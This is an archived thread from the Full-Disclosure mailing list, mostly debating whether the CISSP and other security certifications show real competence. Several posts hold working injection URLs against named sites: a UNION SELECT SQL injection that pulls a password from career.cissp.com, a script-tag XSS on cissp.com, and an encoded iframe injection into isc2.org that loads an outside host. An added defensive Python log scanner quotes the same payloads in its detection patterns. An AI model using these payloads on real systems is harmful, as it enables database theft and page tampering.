Re: [Full-disclosure] CISSP, Final Round
On 8/11/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:

> > Nobody paid them. It's not an official CISSP site. That one would be
> > found at www.isc2.org
>
> Ahh, a simple mistake. This is the *real* certified internet security
> professionals page. [...]
>
> what is this !? :(

What do you think it is? It's a public directory of CISSP certified who have asked to be publicly visible in the directory.

> i hope all these cissp's didn't pay for their materials online :( [...]

These CISSP have explicitly chosen to be visible. That's me: http://tinyurl.com/38dakw (look mama, I'm a hacker. I can use tinyurl!!!)

On 8/14/07, Ray P <[EMAIL PROTECTED]> wrote:
> You really have too much free time on your hands. :-)

And it's sadly lost...

Regards.

--
Marco Ermini
[EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research
http://www.markoer.org/ - https://www.linkedin.com/in/marcoermini
"Jesus saves... but Buddha makes incremental back-ups!"

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CISSP, Final Round
You really have too much free time on your hands. :-)

> From: [EMAIL PROTECTED]
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] CISSP, Final Round
> Date: Sat, 11 Aug 2007 01:14:14 -0400
>
> > > Nobody paid them. It's not an official CISSP site. That one would be
> > > found at www.isc2.org
>
> Ahh, a simple mistake. This is the *real* certified internet security
> professionals page.
>
> https://www.isc2.org/cgi-bin/directory.cgi?Command=Search&Country=&State=&City=&LastName=isc&x=0&y=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A//c99%2eclpwn%2eco%6D%2F%68%6D%2E%68%74%6D%3E
>
> what is this !? :(
> i hope all these cissp's didn't pay for their materials online :(
> bzpz.
[Full-disclosure] CISSP, Final Round
> Nobody paid them. It's not an official CISSP site. That one would be
> found at www.isc2.org

Ahh, a simple mistake. This is the *real* certified internet security professionals page.

https://www.isc2.org/cgi-bin/directory.cgi?Command=Search&Country=&State=&City=&LastName=isc&x=0&y=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A//c99%2eclpwn%2eco%6D%2F%68%6D%2E%68%74%6D%3E

what is this !? :(
i hope all these cissp's didn't pay for their materials online :(

bzpz.
Re: [Full-disclosure] CISSP, round two
Nobody paid them. It's not an official CISSP site. That one would be found at www.isc2.org

http://www.cissp.com/about/about_us.asp - "CISSP.com and all related web sites are an effort by Mr. Afifi to help promote Information Security awareness, the CISSP Certification, share knowledge and communication amongst certified information system security professionals and to help information security professionals who are seeking to become CISSPs."

I'm certain he is happy to have promoted your level of awareness. :-)

> From: Tonu Samuel <[EMAIL PROTECTED]>
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] CISSP, round two
> Date: Mon, 06 Aug 2007 20:00:28 +0300
>
> A long time ago someone posted here an SQL injection on the CISSP page. No changes. I post a slightly "modified" version to bug them again:
>
> http://career.cissp.com/Bios/CompanyBio.asp?EmployerID=10328199%20union%20select%201,2,3,(select%20top%201%20name%20from%20sysobjects%20where%20name%20like%20'%25user%25'%20and%20xtype='U'),(select%20top%201%20password%20from%20USERS),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&Section=Welcome
>
> Who paid $$$ to them to get a "certificate"? hehe :P
>
> Tõnu
[Full-disclosure] CISSP, round two
A long time ago someone posted here an SQL injection on the CISSP page. No changes. I post a slightly "modified" version to bug them again:

http://career.cissp.com/Bios/CompanyBio.asp?EmployerID=10328199%20union%20select%201,2,3,(select%20top%201%20name%20from%20sysobjects%20where%20name%20like%20'%25user%25'%20and%20xtype='U'),(select%20top%201%20password%20from%20USERS),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&Section=Welcome

Who paid $$$ to them to get a "certificate"? hehe :P

Tõnu
[Full-disclosure] CISSP class #2: SQL injection
http://career.cissp.com/Bios/CompanyBio.asp?EmployerID=10'3281&Section=Welcome
Re: [Full-disclosure] CISSP
Daniel Marsh wrote:
> On 6/19/07, Bozo Bad <[EMAIL PROTECTED]> wrote:
>>
>> http://www.cissp.com/store/search.asp?s=%3Cscript%3Ealert(%22Look,mamma, I'm a CISSP!%22)%3C/script%3E
>
> That's a beautiful thing.

Irony at its best.
Re: [Full-disclosure] CISSP
On 6/19/07, Bozo Bad <[EMAIL PROTECTED]> wrote:
> http://www.cissp.com/store/search.asp?s=%3Cscript%3Ealert(%22Look,mamma, I'm a CISSP!%22)%3C/script%3E

That's a beautiful thing.
[Full-disclosure] CISSP
http://www.cissp.com/store/search.asp?s=%3Cscript%3Ealert(%22Look,mamma, I'm a CISSP!%22)%3C/script%3E
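As an added example that is not part of any post in this thread: a Python log scanner that URL-decodes the query strings of constructed access-log lines carrying the same three kinds of request quoted above (the stray quote and UNION SELECT in CompanyBio.asp's EmployerID, the reflected script tag in search.asp, and the percent-encoded iframe in the isc2.org directory search) and flags them, followed by the digits-only check that closes the EmployerID hole server-side. The client addresses, timestamps and the iframe host in the sample lines are constructed placeholders.

```python
"""Flag the injection attempts from this thread in web-server access logs.

Constructed sample data: documentation-range client addresses, made-up
timestamps and sizes, and the placeholder host example.invalid in place of
the iframe target that was posted.
"""
import re
from urllib.parse import parse_qsl, urlsplit

SAMPLE_LOG = """\
203.0.113.5 - - [06/Aug/2007:20:00:28 +0300] "GET /Bios/CompanyBio.asp?EmployerID=10328199%20union%20select%201,2,3,(select%20top%201%20name%20from%20sysobjects%20where%20name%20like%20'%25user%25'%20and%20xtype='U'),(select%20top%201%20password%20from%20USERS),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&Section=Welcome HTTP/1.1" 200 5120
203.0.113.5 - - [06/Aug/2007:20:01:02 +0300] "GET /Bios/CompanyBio.asp?EmployerID=10'3281&Section=Welcome HTTP/1.1" 500 812
198.51.100.9 - - [19/Jun/2007:11:42:10 +0000] "GET /store/search.asp?s=%3Cscript%3Ealert(%22Look,mamma,%20I'm%20a%20CISSP!%22)%3C/script%3E HTTP/1.1" 200 3301
198.51.100.9 - - [11/Aug/2007:01:14:14 -0400] "GET /cgi-bin/directory.cgi?Command=Search&LastName=isc&x=0&y=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A//example.invalid%2Fhm.htm%3E HTTP/1.1" 200 7777
192.0.2.77 - - [11/Aug/2007:01:20:00 -0400] "GET /Bios/CompanyBio.asp?EmployerID=10328199&Section=Welcome HTTP/1.1" 200 5120
"""

# Common Log Format prefix; only the client address, target and status matter here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# What the thread shows: a UNION SELECT against the MSSQL catalogue table
# sysobjects ended with a comment, and a tag or attribute break-out reflected
# into the page. Matching runs on the decoded value, so %3C and %69%66... do
# not hide anything.
SQLI_RE = re.compile(r"\bunion\b.+\bselect\b|\bsysobjects\b|--\s*$", re.I)
HTML_RE = re.compile(r'<\s*(script|iframe)\b|"\s*>\s*<', re.I)

# Parameters the application only ever uses as integers (assumption: the
# EmployerID in the quoted URL is one such value).
NUMERIC_PARAMS = {"EmployerID"}
NUMERIC_RE = re.compile(r"\d{1,10}")


def decode_query(target):
    """Return the percent-decoded (name, value) pairs of a request target's query."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def classify(target):
    """Map each suspicious parameter name to the sorted list of tags it earned."""
    findings = {}
    for name, value in decode_query(target):
        tags = set()
        if SQLI_RE.search(value):
            tags.add("sqli")
        if HTML_RE.search(value):
            tags.add("html-injection")
        if name in NUMERIC_PARAMS and not NUMERIC_RE.fullmatch(value):
            tags.add("not-numeric")
        if tags:
            findings[name] = sorted(tags)
    return findings


def scan_log(text):
    """Return one record per log line that carries at least one finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; a real reviewer would count these separately
        findings = classify(m.group("target"))
        if findings:
            hits.append({"ip": m.group("ip"), "status": m.group("status"),
                         "target": m.group("target"), "findings": findings})
    return hits


def is_valid_employer_id(raw):
    """Digits only. int() alone is too lenient: it accepts whitespace,
    signs and underscores, none of which a path-style id should carry."""
    return NUMERIC_RE.fullmatch(raw) is not None


def validate_employer_id(raw):
    """Server-side fix for the EmployerID cases above: reject anything that is
    not a plain integer, then bind the integer as a query parameter instead of
    concatenating the raw string into SQL."""
    if not is_valid_employer_id(raw):
        raise ValueError("EmployerID must be a positive integer")
    return int(raw)


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["findings"])
```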
Re: RES: [Full-disclosure] CISSP Test
Reminds me of the time when my father had all his letters placed after his name on a letter from the Royal College of Psychiatrists. He is a very bright man and had just been made one of the very few general practitioners (family practitioners) to be made a fellow of the above college, mainly due to being published in peer-reviewed journals every year since 1971 and running a psychosexual clinic for many years. Anywho, the nice postman had added the letters C.R.A.P. after the long list. He laughed, saying that some of the letters had been gleaned during a time when "they were giving them away if you collected enough crisp (chip) packets".

My point and his is that it doesn't really matter what goes after your name as it doesn't mean that much. I myself have MB Ch.B - bachelor of medicine and surgery - and CCNA, but neither of these qualifies me to do anything; my recent experience is much more relevant, so you will find neither of them (or any others that I might accrue because I like the feeling I get taking exams) in my sig. I would rather that people type my name into Google and find something interesting there - don't bother, you won't.

On Mar 29, 2005 10:49 PM, J. Oquendo <[EMAIL PROTECTED]> wrote:
>
> On Tue, 29 Mar 2005, R Mondesir wrote:
>
> > The C.P.A exam for accountants is a better comparison to the CISSP than the Bar exam is for lawyers if we are going to compare industry benchmarks. Either way, an internationally accepted standard seems inevitable.
>
> Funny thing is, outside of the USA, I barely see people abroad toss in fifty different little signatures when they send out mail.
>
> Joe Blow
> SCSA, CISSP, CCIE, CCDA, MCSE, FOOL, PWND, OVRKL
> 55 Main Street
> London Bridge
>
> With the exception of the Cisco certs, I can't recall seeing someone "tag" their CISSP status coming from somewhere outside of the United States. Not to say it is not important, but sigs (and this is all they mean to me... signatures) are becoming overrated and bloated. It's like "Yea well I just obtained my Symantec Uber Certified Klassification! Now I can add a SUCK to my sig!" Give me a break.
>
> I should for kicks dig through some of the mailing lists I'm on and point fingers at CCDA's, MCSE's, CISSP's, and other little signature devils who ask questions a 16 year old can answer. There are those who take tests, and there are those who don't.
>
> I'm sure many on this list know someone who is supposed to know but is actually a clueless gimp.
>
> > > I wholeheartedly agree that there needs to be an industry benchmark, something that says you cannot operate in this field unless you have passed x. I'm thinking along the lines of something similar to the Bar exam that
>
> Industry benchmark? Sure there should be some overall knowledge of just about everything, but how do you define the unknown, which is what most computer security is at its core? Well I guess I'm looking at it from a Greyhat perspective. How do you expect someone to learn vulnerabilities that pop up? It takes a little more than reading and memorizing some book. Bottom line in my opinion.
>
> > > lawyers have to take, or perhaps a license like what doctors are required to obtain before being able to practice. I fear it's going to take something of that level to truly separate the chaff from the wheat. Anything less and you only end up with braindumps and bootcampers throwing resume after resume at you.
>
> It will not separate any chaff from the wheat. How many people just dive into books and pass exams? With the CISSP, one is supposed to have an allotted amount of time in the field. Sure, let's debunk this moronic notion of them validating this... Joe Blow worked for Foo Financial for 10 years. 9 of those years were in the mailroom. His brother-in-law works in the compsec department and convinced his boss to `give him a chance`. Joe Blow with one year experience studies for that one year. Applies to take the test with (get this) 10 years (oh my, he has some experience (does he not!)) under his wing. Joe Blow gets his sig and becomes a sig nazi. Whoopdeedoo. So much for standards.
>
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
> J. Oquendo
> GPG Key ID 0x0D99C05C
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x0D99C05C
>
> sil @ infiltrated . net http://www.infiltrated.net
>
> "How a man plays the game shows something of his
> character - how he loses shows all" - Mr. Luckey
Re: RES: [Full-disclosure] CISSP Test
On Tue, 29 Mar 2005, R Mondesir wrote:

> The C.P.A exam for accountants is a better comparison to the CISSP than the Bar exam is for lawyers if we are going to compare industry benchmarks. Either way, an internationally accepted standard seems inevitable.

Funny thing is, outside of the USA, I barely see people abroad toss in fifty different little signatures when they send out mail.

Joe Blow
SCSA, CISSP, CCIE, CCDA, MCSE, FOOL, PWND, OVRKL
55 Main Street
London Bridge

With the exception of the Cisco certs, I can't recall seeing someone "tag" their CISSP status coming from somewhere outside of the United States. Not to say it is not important, but sigs (and this is all they mean to me... signatures) are becoming overrated and bloated. It's like "Yea well I just obtained my Symantec Uber Certified Klassification! Now I can add a SUCK to my sig!" Give me a break.

I should for kicks dig through some of the mailing lists I'm on and point fingers at CCDA's, MCSE's, CISSP's, and other little signature devils who ask questions a 16 year old can answer. There are those who take tests, and there are those who don't.

I'm sure many on this list know someone who is supposed to know but is actually a clueless gimp.

> > I wholeheartedly agree that there needs to be an industry benchmark, something that says you cannot operate in this field unless you have passed x. I'm thinking along the lines of something similar to the Bar exam that

Industry benchmark? Sure there should be some overall knowledge of just about everything, but how do you define the unknown, which is what most computer security is at its core? Well I guess I'm looking at it from a Greyhat perspective. How do you expect someone to learn vulnerabilities that pop up? It takes a little more than reading and memorizing some book. Bottom line in my opinion.

> > lawyers have to take, or perhaps a license like what doctors are required to obtain before being able to practice. I fear it's going to take something of that level to truly separate the chaff from the wheat. Anything less and you only end up with braindumps and bootcampers throwing resume after resume at you.

It will not separate any chaff from the wheat. How many people just dive into books and pass exams? With the CISSP, one is supposed to have an allotted amount of time in the field. Sure, let's debunk this moronic notion of them validating this... Joe Blow worked for Foo Financial for 10 years. 9 of those years were in the mailroom. His brother-in-law works in the compsec department and convinced his boss to `give him a chance`. Joe Blow with one year experience studies for that one year. Applies to take the test with (get this) 10 years (oh my, he has some experience (does he not!)) under his wing. Joe Blow gets his sig and becomes a sig nazi. Whoopdeedoo. So much for standards.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x0D99C05C
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x0D99C05C

sil @ infiltrated . net http://www.infiltrated.net

"How a man plays the game shows something of his
character - how he loses shows all" - Mr. Luckey
Re: RES: [Full-disclosure] CISSP Test
Given that many of the certificates are now "boot camp" type, this should put a different light on those colleges that are pumping out Bachelors of Information Security, Masters and Doctors of Information Security as well. Wondering if the academic credentials will become important in the longer run.

But without Big Business, and ISSA, OSCOMM, ISC2, SANS and others, an international standard is going to be hard to hammer out. What does a security person really need to know in what role: analyst, engineer, code walker, network engineer, systems security, firewall/IDS admin?

Previously in this thread, it's going to take money, and while the money motivation is there, it will be really hard to get anyone to take anything seriously past the "bottom line". There are going to have to be major sources of aggravation, and maybe the feds will step in with minimum qualifications much like GSA or NSA have done? Who knows, it's going to be a rough couple of years for IS. Going to be a lifetime's work for whoever takes this one up.

r/
Dan

Sometimes MSN E-mail will indicate that the message failed to be delivered. Please resend when you get those; it does not mean that the mail box is bad, merely that MSN mail is overworked at the time.

> From: R Mondesir <[EMAIL PROTECTED]>
> Reply-To: R Mondesir <[EMAIL PROTECTED]>
> To: SecurityLSI <[EMAIL PROTECTED]>
> CC: full-disclosure@lists.grok.org.uk
> Subject: Re: RES: [Full-disclosure] CISSP Test
> Date: Tue, 29 Mar 2005 16:36:13 -0500
>
> The C.P.A exam for accountants is a better comparison to the CISSP than the Bar exam is for lawyers if we are going to compare industry benchmarks. Either way, an internationally accepted standard seems inevitable.
>
> -Rafiyq
>
> On Sat, 26 Mar 2005 01:26:36 -0500, SecurityLSI <[EMAIL PROTECTED]> wrote:
> > I wholeheartedly agree that there needs to be an industry benchmark, something that says you cannot operate in this field unless you have passed x. I'm thinking along the lines of something similar to the Bar exam that lawyers have to take, or perhaps a license like what doctors are required to obtain before being able to practice. I fear it's going to take something of that level to truly separate the chaff from the wheat. Anything less and you only end up with braindumps and bootcampers throwing resume after resume at you.
> >
> > The added bonus of having an industry benchmark that bars entry into the field tracks to something a mentor once told me: people that belong to unions drive Chevys and Fords. Those that belong to associations drive BMWs and Mercedes.
> >
> > --Joe
> >
> > - Original Message -
> > From: "Vladamir" <[EMAIL PROTECTED]>
> > To: "Jose Ribeiro Junior" <[EMAIL PROTECTED]>
> > Cc: <>
> > Sent: Wednesday, March 23, 2005 1:52 PM
> > Subject: Re: RES: [Full-disclosure] CISSP Test
> >
> > > CCIE is where it's at.
> > >
> > > I love writing practice tests, but I'm only 20, so what do I know
> > >
> > > Jose Ribeiro Junior wrote:
> > > > Hi Friends,
> > > >
> > > > What do you think about the CCIE certification model, practice and written tests?
> > > >
> > > > I think that is a good model for Security Certifications.
> > > >
> > > > But can you create practice tests not using specific vendors?
> > > >
> > > > -Original Message-
> > > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] on behalf of Vladamir
> > > > Sent: Wednesday, 23 March 2005 14:23
> > > > To: DAN MORRILL
> > > > Cc: full-disclosure@lists.grok.org.uk
> > > > Subject: Re: [Full-disclosure] CISSP Test
> > > >
> > > > Very good points, so.. who wants to start writing to the mentioned organizations about this?
> > > >
> > > > DAN MORRILL wrote:
> > > >
> > > > > I think in reading the multiple threads on this issue, there are a number of perspectives on the value of the CISSP.
> > > > >
> > > > > What was most interesting was the CEO's perspective. Since the CISSP is a boot camp, and the SANS is bootcampable in the longer run with the removal of the practical. The real question is working towards a certificate that demonstrates ability to work in the security arena, one that is really hard to get, and one that really tests the ability to do the work.
> > > > >
> > > > > While CISSP and SANS are great to have as a resume filter, it does not imply that anyone with either certificate to their name can actually do the work. What I am seeing is that many people are going for t
Re: RES: [Full-disclosure] CISSP Test
The C.P.A exam for accountants is a better comparison to the CISSP than the Bar exam is for lawyers if we are going to compare industry benchmarks. Either way, an internationally accepted standard seems inevitable.

-Rafiyq

On Sat, 26 Mar 2005 01:26:36 -0500, SecurityLSI <[EMAIL PROTECTED]> wrote:
> I wholeheartedly agree that there needs to be an industry benchmark, something that says you cannot operate in this field unless you have passed x. I'm thinking along the lines of something similar to the Bar exam that lawyers have to take, or perhaps a license like what doctors are required to obtain before being able to practice. I fear it's going to take something of that level to truly separate the chaff from the wheat. Anything less and you only end up with braindumps and bootcampers throwing resume after resume at you.
>
> The added bonus of having an industry benchmark that bars entry into the field tracks to something a mentor once told me: people that belong to unions drive Chevys and Fords. Those that belong to associations drive BMWs and Mercedes.
>
> --Joe
>
> - Original Message -
> From: "Vladamir" <[EMAIL PROTECTED]>
> To: "Jose Ribeiro Junior" <[EMAIL PROTECTED]>
> Cc: <>
> Sent: Wednesday, March 23, 2005 1:52 PM
> Subject: Re: RES: [Full-disclosure] CISSP Test
>
> > CCIE is where it's at.
> >
> > I love writing practice tests, but I'm only 20, so what do I know
> >
> > Jose Ribeiro Junior wrote:
> > > Hi Friends,
> > >
> > > What do you think about the CCIE certification model, practice and written tests?
> > >
> > > I think that is a good model for Security Certifications.
> > >
> > > But can you create practice tests not using specific vendors?
> > >
> > > -Original Message-
> > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] on behalf of Vladamir
> > > Sent: Wednesday, 23 March 2005 14:23
> > > To: DAN MORRILL
> > > Cc: full-disclosure@lists.grok.org.uk
> > > Subject: Re: [Full-disclosure] CISSP Test
> > >
> > > Very good points, so.. who wants to start writing to the mentioned organizations about this?
> > >
> > > DAN MORRILL wrote:
> > >
> > > > I think in reading the multiple threads on this issue, there are a number of perspectives on the value of the CISSP.
> > > >
> > > > What was most interesting was the CEO's perspective. Since the CISSP is a boot camp, and the SANS is bootcampable in the longer run with the removal of the practical. The real question is working towards a certificate that demonstrates ability to work in the security arena, one that is really hard to get, and one that really tests the ability to do the work.
> > > >
> > > > While CISSP and SANS are great to have as a resume filter, it does not imply that anyone with either certificate to their name can actually do the work. What I am seeing is that many people are going for these, and have them, but hand them a result from an IDS system, or ask them to do a security design for either a network or a chunk of code, the ability to actually perform the task is not there, even though they have the certificate.
> > > >
> > > > Personally, I believe the community needs something, certificate, degree, internship, whatever, that actually means you can perform competently in the security arena. That there is a skill set there that the entire community agrees upon is the minimum recommended skill set to work in this field. If we had something like that, then any school that is pumping out Bachelors of Information Security folks would have a standard. Anyone building a bootcamp or certificate program would have an agreed upon community standard to work with.
> > > >
> > > > ISC2, ISSA, WSA, SANS, et al. could build a board in conjunction with the community, develop the minimum qualifications to work in the field, and actually accomplish something once they have been certified or degreed. NSA has been hugely successful in developing security schools through James Madison, Boise, et al. But they have to agree to and teach to the minimum standard that NSA has put together t
Re: [OT] [Full-disclosure] CISSP Test
- Original Message -
From: SecurityLSI <[EMAIL PROTECTED]>
To: "Anders Langworthy" <[EMAIL PROTECTED]>;
Sent: Saturday, March 26, 2005 12:16 PM
Subject: Re: [OT] [Full-disclosure] CISSP Test

> When it comes to InfoSec, it's not hard to imagine the government mandating a form of licensing for all security professionals that deal with regulated privacy matters (i.e. HIPAA et al). In fact, I think this would be a good thing as it would inevitably be extended to other realms of IT, although it would probably occur in an informal fashion.
>
> As more and more privacy regulation becomes the norm, I fully encourage the government to require some form of high-level certification that must be an across-the-board mandate (i.e. licensing). It's the only way to ensure competent professionals are the ones filling security positions. That's not to say there still won't be some duds, but at least you won't have the flood of bootcampers, braindumps, and paper certs who are only out to make a fast buck. After all, the security of our citizens' privacy, as well as the integrity of our nation's critical infrastructures, are at stake.
>
> --Joe
>
> - Original Message -
> From: "Anders Langworthy" <[EMAIL PROTECTED]>
> To:
> Sent: Saturday, March 26, 2005 1:59 AM
> Subject: Re: [OT] [Full-disclosure] CISSP Test
>
> > SecurityLSI wrote:
> > > I wholeheartedly agree that there needs to be an industry benchmark, something that says you cannot operate in this field unless you have passed x. I'm thinking along the lines of something similar to the Bar exam that lawyers have to take, or perhaps a license like what doctors are required to obtain before being able to practice. I fear it's going to take something of that level to truly separate the chaff from the wheat. Anything less and you only end up with braindumps and bootcampers throwing resume after resume at you.
> >
> > There is an important distinction between something like the Bar, and medical licensure. The InfoSec equivalent of the legal Bar would be impossible to implement, because unlike a courtroom, a network is not under regulated control. If you wish to practice law, you must do it in a government-controlled courtroom*, and that government says that you must pass the Bar before doing so.
> >
> > My network, on the other hand--like my body--belongs to me. Nobody has the right to tell me who I can and cannot hire to work on them. In the same way, I could pay somebody off the street to perform surgery on me if I wished. I wouldn't recommend it, and they wouldn't be a licensed doctor, but nobody can stop me.
> >
> > So what difference does it make if we add another benchmark/"cert"? We already have plenty. Even if it were possible, would we really want to grant absolute power to something like the medical AMA?
> >
> > * Judge Judy doesn't count.
> >
> > --
> > Anders
Re: [OT] [Full-disclosure] CISSP Test
SecurityLSI wrote:
> I wholeheartedly agree that there needs to be an industry benchmark, something that says you cannot operate in this field unless you have passed x. I'm thinking along the lines of something similar to the Bar exam that lawyers have to take, or perhaps a license like what doctors are required to obtain before being able to practice. I fear it's going to take something of that level to truly separate the chaff from the wheat. Anything less and you only end up with braindumps and bootcampers throwing resume after resume at you.

There is an important distinction between something like the Bar, and medical licensure. The InfoSec equivalent of the legal Bar would be impossible to implement, because unlike a courtroom, a network is not under regulated control. If you wish to practice law, you must do it in a government-controlled courtroom*, and that government says that you must pass the Bar before doing so.

My network, on the other hand--like my body--belongs to me. Nobody has the right to tell me who I can and cannot hire to work on them. In the same way, I could pay somebody off the street to perform surgery on me if I wished. I wouldn't recommend it, and they wouldn't be a licensed doctor, but nobody can stop me.

So what difference does it make if we add another benchmark/"cert"? We already have plenty. Even if it were possible, would we really want to grant absolute power to something like the medical AMA?

* Judge Judy doesn't count.

--
Anders
Re: RES: [Full-disclosure] CISSP Test
I wholeheartedly agree that there needs to be an industry benchmark, something that says you cannot operate in this field unless you have passed x. I'm thinking along the lines of something similar to the Bar exam that lawyers have to take, or perhaps a license like what doctors are required to obtain before being able to practice. I fear it's going to take something of that level to truly separate the chaff from the wheat. Anything less and you only end up with braindumps and bootcampers throwing resume after resume at you.

The added bonus of having an industry benchmark that bars entry into the field tracks to something a mentor once told me: people that belong to unions drive Chevys and Fords. Those that belong to associations drive BMWs and Mercedes.

--Joe

- Original Message -
From: "Vladamir" <[EMAIL PROTECTED]>
To: "Jose Ribeiro Junior" <[EMAIL PROTECTED]>
Cc: <>
Sent: Wednesday, March 23, 2005 1:52 PM
Subject: Re: RES: [Full-disclosure] CISSP Test

> CCIE is where it's at.
>
> I love writing practice tests, but I'm only 20, so what do I know
>
> Jose Ribeiro Junior wrote:
> > Hi Friends,
> >
> > What do you think about the CCIE certification model, practice and written tests?
> >
> > I think that is a good model for Security Certifications.
> >
> > But can you create practice tests not using specific vendors?
> >
> > -Original Message-
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] on behalf of Vladamir
> > Sent: Wednesday, 23 March 2005 14:23
> > To: DAN MORRILL
> > Cc: full-disclosure@lists.grok.org.uk
> > Subject: Re: [Full-disclosure] CISSP Test
> >
> > Very good points, so.. who wants to start writing to the mentioned organizations about this?
> >
> > DAN MORRILL wrote:
> >
> > > I think in reading the multiple threads on this issue, there are a number of perspectives on the value of the CISSP.
> > >
> > > What was most interesting was the CEO's perspective. Since the CISSP is a boot camp, and the SANS is bootcampable in the longer run with the removal of the practical. The real question is working towards a certificate that demonstrates ability to work in the security arena, one that is really hard to get, and one that really tests the ability to do the work.
> > >
> > > While CISSP and SANS are great to have as a resume filter, it does not imply that anyone with either certificate to their name can actually do the work. What I am seeing is that many people are going for these, and have them, but hand them a result from an IDS system, or ask them to do a security design for either a network or a chunk of code, the ability to actually perform the task is not there, even though they have the certificate.
> > >
> > > Personally, I believe the community needs something, certificate, degree, internship, whatever, that actually means you can perform competently in the security arena. That there is a skill set there that the entire community agrees upon is the minimum recommended skill set to work in this field. If we had something like that, then any school that is pumping out Bachelors of Information Security folks would have a standard. Anyone building a bootcamp or certificate program would have an agreed upon community standard to work with.
> > >
> > > ISC2, ISSA, WSA, SANS, et al. could build a board in conjunction with the community, develop the minimum qualifications to work in the field, and actually accomplish something once they have been certified or degreed. NSA has been hugely successful in developing security schools through James Madison, Boise, et al. But they have to agree to and teach to the minimum standard that NSA has put together to meet the needs that NSA has identified.
> > >
> > > I think until we as a community agree upon a minimum standard, apply it consistently across the board much like doctors, lawyers, social workers, and other degreed or licensed professionals, we will continue to have this debate until the house burns down. As security professionals, as security folks, we have the same ability to either do good, or do harm as any other profession does. We need to understand this, and begin working towards skill sets either certificate or degree that actually mean something useful at the end of the day.
RE: [Full-disclosure] CISSP Test
>I think that is a good model for Security Certifications. >But, can you create practice tests not using specific vendors?

For 3 years ISECOM has been providing practical, vendor-neutral, tool-neutral, professional certification exams that test skill and applied knowledge fairly and accurately. ISECOM is a non-profit registered in the US and in Spain and our exam fees go into the info-security and open methodology projects we provide for free (and Free). So yes, it is possible. It's time extensive, costly to maintain, and complex to provide which is why not everyone does it. But ISECOM does and will continue to do so.

Sincerely, -pete.

-- Pete Herzog - Managing Director - [EMAIL PROTECTED] ISECOM - Institute for Security and Open Methodologies www.isecom.org - www.osstmm.org www.hackerhighschool.org - www.isestorm.org --- ISECOM is the OSSTMM Professional Security Tester (OPST), OSSTMM Professional Security Analyst (OPSA), and Hacker Highschool Teacher certification authority.

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: RES: [Full-disclosure] CISSP Test
CCIE is where it's at. I love writing practice tests, but I'm only 20, so what do I know

Jose Ribeiro Junior wrote: Hi Friends, What do you think about the CCIE certification model, practice and written tests? I think that is a good model for Security Certifications. But can you create practice tests not using specific vendors?

-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] on behalf of Vladamir Sent: Wednesday, 23 March 2005 14:23 To: DAN MORRILL Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] CISSP Test

Very good points, so.. who wants to start writing to the mentioned organizations about this?

DAN MORRILL wrote: I think in reading the multiple threads on this issue, there are a number of perspectives on the value of the CISSP. What was most interesting was the CEO's perspective. Since the CISSP is a boot camp, and the SANS is bootcampable in the longer run with the removal of the practical. The real question is working towards a certificate that demonstrates ability to work in the security arena, one that is really hard to get, and one that really tests the ability to do the work. While CISSP and SANS are great to have as a resume filter, it does not imply that anyone with either certificate to their name can actually do the work. What I am seeing is that many people are going for these, and have them, but had them a result from an IDS system, or ask them to do a security design for either a network or a chunk of code, the ability to actually perform the task is not there, even though they have the certificate. Personally, I believe the community needs something, certificate, degree, internship, what ever, that actually means you can perform competently in the security arena. That there is a skill set there that the entire community agrees upon is the minimum recommended skill set to work in this field. If we had something like that, then any school that is pumping out Bachelors of Information Security folks would have a standard. Anyone building a bootcamp or certificate program would have an agreed upon community standard to work with. ISC2, ISSA, WSA, SANS, et al. Could build a board in conjunction with the community, develop the minimum qualifications to work in the field, and actually accomplish something once they have been certified or degreed. NSA has been hugely successful in developing security schools through James Madison, Boise, et al. But they have to agree to and teach to the minimum standard that NSA has put together to meet the needs that NSA has identified. I think until we as a community agree upon a minimum standard, apply it consistently across the board much like doctors, lawyers, social workers, and other degreed or licensed professionals, we will continue to have this debate until the house burns down. As security professionals, as security folks, we have the same ability to either do good, or do harm as any other profession does. We need to understand this, and begin working towards skill sets either certificate or degree that actually mean something useful at the end of the day. My thoughts, flames invited. r/ Dan Sometimes MSN E-mail will indicate that the message failed to be delivered. Please resend when you get those, it does not mean that the mail box is bad, merely that MSN mail is over worked at the time.

From: "Clement Dupuis" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>,"'Vladamir'" <[EMAIL PROTECTED]> CC: full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] CISSP Test Date: Wed, 23 Mar 2005 06:45:47 -0500

